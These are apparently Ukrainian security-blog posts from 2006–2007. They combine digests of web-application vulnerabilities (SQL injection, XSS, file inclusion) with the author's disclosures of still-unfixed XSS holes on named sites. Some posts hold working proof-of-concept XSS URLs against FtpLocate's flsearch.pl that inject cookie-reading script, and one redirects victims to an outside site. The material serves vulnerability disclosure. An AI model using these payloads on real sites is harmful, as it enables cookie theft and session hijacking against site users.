Websecurity - Веб безпека

В даній добірці уразливості в веб додатках:

• A+ Store E-Commerce[ injection sql & xss (post) ] (деталі)
• Blogme v3 [admin login bypass & xss (post)] (деталі)
• FunkyASP Glossary v1.0 [injection sql] (деталі)
• Evolve Merchant[ injection sql ] (деталі)
• Car Site Manager [injection sql & xss (get)] (деталі)
• Inventory Manager [injection sql & xss (get)] (деталі)
• BPG Content Management System SQL Injection (деталі)
• Міжсайтовий скриптінг в Diesel Pay (деталі)
• Cross-site scripting vulnerability in E-commerce 4.7 for Drupal (деталі)
• Міжсайтовий скриптінг в Doika Guestbook (деталі)

14.12.2006

У жовтні, 02.10.2006, я знайшов Cross-Site Scripting уразливість на сайті відомого лічильника http://spylog.ru. Про що найближчим часом сповіщу адміністрацію сайту.

Я вже писав раніше про попередні уразливості на spylog.ru.

Детальна інформація про уразливості з’явиться пізніше.

06.03.2007

XSS:

• alert(document.cookie)
• цікавий

Дана уразливість досі не виправлена.

В даній добірці уразливості в веб додатках:

• Verity Ultraseek Request Proxying Vulnerability (деталі)
• E-Calendar Pro 3.0 [ login bypass & injection sql (post)] (деталі)
• MultiCalendars [ multiples injection sql ] (деталі)
• Dragon calendar [ login bypass & injection sql ] (деталі)
• hpecs shopping cart[login bypass & injection sql (post)] (деталі)
• A-Cart pro[ injection sql (post&get)] (деталі)
• Property Site Manager [login bypass ,multiples injection sql & xss (get)] (деталі)
• SQL injection vulnerability in Drupal Easylinks Module (деталі)
• Міжсайтовий скриптінг та SQL-ін’єкція в indexcity (деталі)
• PHP remote file inclusion vulnerability in Diesel Smart Traffic (деталі)

06.12.2006

У жовтні, 01.10.2006, я знайшов кілька Cross-Site Scripting уразливостей на відомому проекті http://qs.kiev.ua - одразу на декількох його сайтах: http://qs.kiev.ua (портал), http://search.qs.kiev.ua (пошук) та http://news.qs.kiev.ua (новини). Про що найближчим часом сповіщу адміністрацію проекту.

Детальна інформація про уразливості з’явиться пізніше. Треба дати час адмінам на реакцію з цього приводу.

03.03.2007

XSS:

http://qs.kiev.ua

• alert(document.cookie)
• цікавий
• html включення

http://search.qs.kiev.ua

• alert(document.cookie)
• цікавий
• html включення

http://news.qs.kiev.ua

• alert(document.cookie)
• цікавий
• html включення

Дані уразливісті досі не виправлені.

В даній добірці уразливості в веб додатках:

• Exophpdesk V1.2 - Remote File Include (деталі)
• PHPKit 1.6.1 RC2 (faq/faq.php) Remote SQL Injection Exploit (деталі)
• Xtreme ASP Photo Gallery Cross Site Scripting And SQL Injection (деталі)
• MetaCart e-Shop [multiples injection sql (get & post)] (деталі)
• E-commerce Kit 1 PayPal Edition [ injection sql ] (деталі)
• TorrentFlux 2.2 Arbitrary File Creation/Overwrite/Deletion & Command Execution Vulnerablities (деталі)
• Bloo => 1.00 Cross Site Scripting (деталі)
• Міжсайтовий скриптінг в Diesel Job Site (деталі)
• Multiple PHP remote file inclusion in the Rssxt component for Joomla! (деталі)
• Cross-site scripting (XSS) vulnerability in Drupal Easylinks Module (деталі)

Ще в жовтні минулого року (12.10.2006) я знайшов Cross-Site Scripting уразливості в FtpLocate - це движок пошуку по ftp серверам. Дані уразливості зокрема я знайшов на сайті locate.in.ua (про що я писав), адмінам якого я повідомив.

Уразливим до XSS є версія FtpLocate 2.02 (і можливо попередні).

XSS:

Уразливості в скрипті flsearch.pl в параметрах all, query, nounix, sizemin, sizemax, sizeunit та sizebytes.

http://site/cgi-bin/ftplocate/flsearch.pl?all=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&query=test
http://site/cgi-bin/ftplocate/flsearch.pl?query=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://site/cgi-bin/ftplocate/flsearch.pl?query=test&nounix=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://site/cgi-bin/ftplocate/flsearch.pl?query=test&sizemin=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://site/cgi-bin/ftplocate/flsearch.pl?query=test&sizemax=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://site/cgi-bin/ftplocate/flsearch.pl?query=test&sizeunit=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://site/cgi-bin/ftplocate/flsearch.pl?query=test&sizebytes=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://site/cgi-bin/ftplocate/flsearch.pl?query=test&sizebytes=%22%3E%3Cscript%3Edocument.location%3D'http://websecurity.com.ua'%3C/script%3E

13.12.2006

У жовтні, 01.10.2006, я знайшов декілька Cross-Site Scripting уразливостей на популярному проекті http://www.mavicanet.com (Багатомовний Пошуковий Каталог). Про що найближчим часом сповіщу адміністрацію проекту.

Детальна інформація про уразливості з’явиться пізніше. Треба дати час адмінам на реакцію з цього приводу.

01.03.2007

XSS:

• alert(document.cookie)
• html включення
• html ін’єкція
• alert(document.cookie)
• html включення
• alert(document.cookie)
• цікавий
• html включення

Дані уразливісті досі не виправлені.

В даній добірці уразливості в веб додатках:

• NuStore 1.0 (Products.asp) Remote SQL Injection Vulnerability (деталі)
• NuRems 1.0 Remote XSS/SQL Injection Exploit (деталі)
• UStore 1.0 (detail.asp) Remote SQL Injection Vulnerability (деталі)
• Mega Mall [ multiples injection sql & full path disclosure ] (деталі)
• MyStats <=1.0.8 [injection sql, multiples xss, array & full path disclosure] (деталі)
• TOPSTORY BASIC Version 1.0 => Remote File Include Vulnerability (деталі)
• ShopSystems - SQL Injection Issue (деталі)
• Multiple SQL injection vulnerabilities in Guder und Koch Netzwerktechnik Eichhorn Portal (деталі)
• Vulnerability in Webmin before 1.290 and Usermin before 1.220 (деталі)
• Міжсайтовий скриптінг в Diesel Paid Mail (деталі)

05.12.2006

У жовтні, 01.10.2006, я знайшов Cross-Site Scripting уразливість на проекті http://www.uaportal.com - відомому порталі Уанету. Про що найближчим часом сповіщу адміністрацію проекту.

Раніше я вже писав про інші знайдені уразливості на uaportal.com.

Детальна інформація про уразливість з’явиться пізніше.

27.02.2007

XSS:

• alert(document.cookie)
• цікавий
• html включення

Дана уразливість досі не виправлена.

В даній добірці уразливості в веб додатках:

• Asp Scripter Products (cpLogin.asp) Remote SQL ByPass Injection Vulnerability (деталі)
• UltraSite 1.0 (update.asp) Remote SQL Injection Vulnerability (деталі)
• ELOG Web Logbook Remote Denial of Service Vulnerability (деталі)
• Phpdebug 1.1.0 - Remote File Include by Firewall (деталі)
• Phpjobscheduler 3.0 - Multiple Remote File Include (деталі)
• Aigaion Web Interface remote file inclusion (деталі)
• infinicart [ multiples injection sql & xss (post) ] (деталі)
• Міжсайтовий скриптінг в TikiWiki (деталі)
• Vulnerability in NSS Affects Sun Java System Web Server and Sun ONE Application Server (деталі)
• Multiple XSS vulnerabilities in Guder und Koch Netzwerktechnik Eichhorn Portal (деталі)